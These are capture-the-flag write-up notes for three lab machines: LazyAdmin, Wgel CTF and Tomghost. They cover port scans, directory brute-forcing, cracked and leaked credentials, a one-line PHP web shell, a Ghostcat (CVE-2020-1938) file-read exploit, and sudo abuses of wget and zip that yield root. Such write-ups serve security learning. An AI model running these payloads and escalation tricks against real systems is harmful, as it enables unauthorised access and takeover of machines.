LazyAdmin
lazyadmin
Enumeration
1 2 3 4 5 6
| ❯ nmap 10.10.136.56 -p80 -sV ... PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
dirb http://10.10.136.56/
|
- Username:
manager (found in SQL file)
- Password:
Password123 (cracked via CrackStation)
Exploitation
- Upload PHP reverse shell:
<?php system($_GET["cmd"]);?>
- Check sudo privileges:
sudo -l
- Exploit
backup.pl calling
/etc/copy.sh.
Wgel CTF
wgelctf
Enumeration
1 2 3
| ❯ nmap 10.10.120.10 -sV -p80 ... 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
- Found username
jessie in HTML comment.
- Discovered
.ssh/id_rsa via directory
brute-forcing.
Exploitation
1
| ssh -i id_rsa jessie@10.10.120.10
|
Privilege Escalation
1 2 3
| jessie@CorpOne:~$ sudo -l ... (root) NOPASSWD: /usr/bin/wget
|
Exploit wget to overwrite /etc/sudoers or
read sensitive files.
Tomghost
tomghost
Enumeration
1 2 3 4
| ❯ nmap 10.10.189.103 -p 8080,8009 -sV ... 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.30
|
Exploitation
Exploit Ghostcat (CVE-2020-1938) to read
WEB-INF/web.xml:
1 2 3
| ❯ python2 48143.py -f WEB-INF/web.xml -p 8009 10.10.189.103 ... skyfuck:8730281lkjlkjdqlksalks
|
Privilege Escalation
- Crack PGP key using
gpg2john.
- Decrypt
credential.pgp to get merlin's
password.
- Exploit
sudo /usr/bin/zip via GTFOBins.
1 2 3
| TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' sudo rm $TF
|